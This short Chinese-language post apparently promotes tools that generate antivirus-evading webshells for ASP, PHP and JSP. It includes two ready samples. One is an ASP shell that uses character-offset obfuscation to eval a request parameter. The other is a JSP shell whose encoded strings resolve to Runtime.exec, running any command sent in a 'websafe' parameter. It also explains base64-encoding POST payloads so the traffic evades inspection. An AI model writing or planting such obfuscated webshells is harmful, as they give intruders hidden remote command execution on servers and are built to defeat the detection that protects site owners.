webshell免杀案例。
python3 asp-venom.py //生成
python3 asp-venom.py > test.asp //保存
示例代码
<%
<!--
Function Hsnh(Bjhu):
Bjhu = Split(Bjhu,"|")
For x=1 To Ubound(Bjhu)
Hsnh=Hsnh&Chr(Bjhu(x)-31)
Next
End Function
EXecutE(Hsnh("|132|149|128|139|63|145|132|144|148|132|146|147|71|65|152|153|131|131|140|145|85|65|72"))
-->
%>
python3 php_venom_3.3.py //生成免杀一句话
python3 php_venom_3.3.py shell.php //对同目录下shell.php进行免杀处理,结果保存在shell.php.bypass.php
3.x 使用说明:
是否传入id参数决定是否把流量编码
http://www.xxx.com/shell.php
POST: mr6=phpinfo(); //与普通shell相同
http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)
POST: mr6=cGhwaW5mbygpOwo= //payload的base64编码
python3 jsp-venom.py //生成
python3 jsp-venom.py > test.jsp //保存
生成样例
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%!public String vADM(String mPk){String BJM="";for (int i = 0; i < mPk.length(); i++) {BJM+=(char)(mPk.charAt(i)+-4);}return BJM;}
%>
<% String sbd=request.getParameter("websafe");if(sbd!=null){ Class cjwV = Class.forName(vADM("neze2perk2Vyrxmqi"));
Process rsSk = (Process) cjwV.getMethod(vADM("i|ig"), String.class).invoke(cjwV.getMethod(vADM("kixVyrxmqi")).invoke(null),sbd); java.io.InputStream in = rsSk.getInputStream();byte[] iLT = new byte[2048];out.print("<pre>");while(in.read(iLT)!=-1){ out.println(new String(iLT)); }out.print("</pre>"); }
%>
通过项目地址下载
热文推荐